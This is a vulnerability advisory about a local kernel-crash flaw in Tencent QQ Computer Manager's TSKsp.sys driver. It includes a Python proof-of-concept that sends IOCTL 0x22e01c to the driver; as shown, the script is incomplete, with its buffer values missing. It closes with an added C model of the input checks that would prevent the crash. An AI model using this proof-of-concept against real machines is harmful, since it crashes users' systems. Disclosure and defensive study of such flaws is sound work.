Affected Versions:
Tencent QQ Computer Manager 4.0 Beta1
Vulnerability description:
QQ Computer Manager is an upgraded version of QQ Doctor 3.3. Its main functions include security protection, system optimization, and software management.
The TSKsp.sys driver installed by QQ Computer Manager does not correctly verify the call parameters submitted by the user. Local users can submit malicious IOCTL requests to cause a kernel crash.
<* Reference
Lufeng Li (lilf@neusoft.com)
*>
Test method:
The program (method) provided on this site may be offensive and is intended only for security research and teaching. Use it at your own risk!
#!/usr/bin/python
#################################################################
#
# Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: http://pcmgr.qq.com
# Vulnerable App: http://dl_dir2.qq.com/invc/qqmaster/setup/QQPCMgr_Setup.exe
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQpcmgr v4.0Beta1
# Vulnerable: QQpcmgr <= v4.0Beta1
#
#################################################################
from ctypes import *

kernel32 = windll.kernel32
psapi = windll.Psapi

if __name__ == '__main__':
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2
    DEVICE_NAME = "\\\\.\\tsksp"
    dwReturn = c_ulong()
    # The two buffer values are not present on this page; the call below passes a length of 0 for both.
    out_data =
    in_data =
    # Open a handle to the device object exposed by TSKsp.sys.
    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
                                          0, None, CREATE_ALWAYS, 0, None)
    # Send control code 0x22e01c with zero-length input and output buffers.
    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data, 0, out_data, 0, byref(dwReturn), None)
Vendor patch:
Tencent
http://dl_dir2.qq.com/invc/qqpcmgr/setup/QQPCMgr_Setup_40_286.exe
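
Added example, not code from the original advisory or from Tencent: a user-mode C model of the pointer and length checks a METHOD_BUFFERED IOCTL handler needs before touching its buffer, applied to the control code 0x22e01c and the zero-length buffers used in the test script above. The names `demo_request`, `demo_ioctl` and `demo_dispatch` and the request layout are hypothetical; the advisory does not say which check TSKsp.sys omits.

```c
#include <stddef.h>
#include <stdint.h>

/* Field layout of a Windows I/O control code (the CTL_CODE macro). */
#define IOCTL_DEVICE(c)   (((c) >> 16) & 0xFFFFu)
#define IOCTL_ACCESS(c)   (((c) >> 14) & 0x3u)
#define IOCTL_FUNCTION(c) (((c) >> 2) & 0xFFFu)
#define IOCTL_METHOD(c)   ((c) & 0x3u)
#define METHOD_BUFFERED   0u

#define IOCTL_FROM_PAGE 0x22e01cu   /* control code used by the test script */
/* NTSTATUS values as defined in ntstatus.h. */
#define STATUS_SUCCESS                0x00000000u
#define STATUS_INVALID_PARAMETER      0xC000000Du
#define STATUS_INVALID_DEVICE_REQUEST 0xC0000010u
#define STATUS_BUFFER_TOO_SMALL       0xC0000023u

/* Hypothetical request layout; the advisory does not document the real one. */
typedef struct { uint32_t op; uint32_t arg; } demo_request;

/* Model of what a dispatch routine reads from the IRP and its stack location. */
typedef struct {
    uint32_t code;          /* IoControlCode */
    void    *system_buffer; /* AssociatedIrp.SystemBuffer */
    uint32_t in_len;        /* InputBufferLength */
    uint32_t out_len;       /* OutputBufferLength */
} demo_ioctl;

uint32_t demo_dispatch(const demo_ioctl *io)
{
    if (io->code != IOCTL_FROM_PAGE)
        return STATUS_INVALID_DEVICE_REQUEST;
    /* METHOD_BUFFERED with both lengths 0: the I/O manager allocates no
       system buffer, so the pointer is NULL and must not be dereferenced. */
    if (io->system_buffer == NULL || io->in_len < sizeof(demo_request))
        return STATUS_INVALID_PARAMETER;
    if (io->out_len < sizeof(uint32_t))
        return STATUS_BUFFER_TOO_SMALL;
    const demo_request *req = io->system_buffer;
    uint32_t result = req->op + req->arg;       /* read input before overwriting */
    *(uint32_t *)io->system_buffer = result;    /* output shares the same buffer */
    return STATUS_SUCCESS;
}

int main(void)
{
    demo_ioctl poc = { IOCTL_FROM_PAGE, NULL, 0, 0 };  /* shape of the page's request */
    return demo_dispatch(&poc) == STATUS_INVALID_PARAMETER ? 0 : 1;
}
```

Decoded with the macros above, 0x22e01c is device type 0x22, function 0x807, read and write access, METHOD_BUFFERED.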